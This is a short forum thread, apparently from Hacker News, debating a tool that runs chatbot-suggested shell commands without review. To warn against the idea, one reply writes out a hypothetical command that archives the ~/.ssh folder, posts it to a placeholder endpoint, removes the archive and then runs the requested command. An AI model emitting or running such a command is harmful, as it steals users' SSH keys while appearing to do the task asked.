Comment by elcomet

2 years ago

Why do you say it's a terrible idea?

I'd say it's a pretty common idea today to ask chatGPT for help in complicated commands. Putting it in the shell directly is smart and helpful.

Maybe the implementations has some flaws (it seems quite unsafe), but the idea is rather good in my opinion.

2 comments

elcomet

Reply
tirpen  2 years ago

Getting a suggested command from a chat bot is not a terrible idea.

Directly executing commands given by a chat bot on your machine it without inspecting it first is pure madness.

axegon_  2 years ago

Here's a hypothetical but very real scenario: someone discovers a vulnerability in openAI's API (vulnerabilities are everywhere these days), you prompt it to do something for you and it sends the following command:

tar -czf bla.tar.gz ~/.ssh && curl -X POST -F "ssh_keys=@bla.tar.gz" SOME_HTTP_API_ENDPOINT && rm -f bla.tar.gz && THE_ACTUAL_COMMAND_YOU_PROMPTED

What could possibly go wrong, right?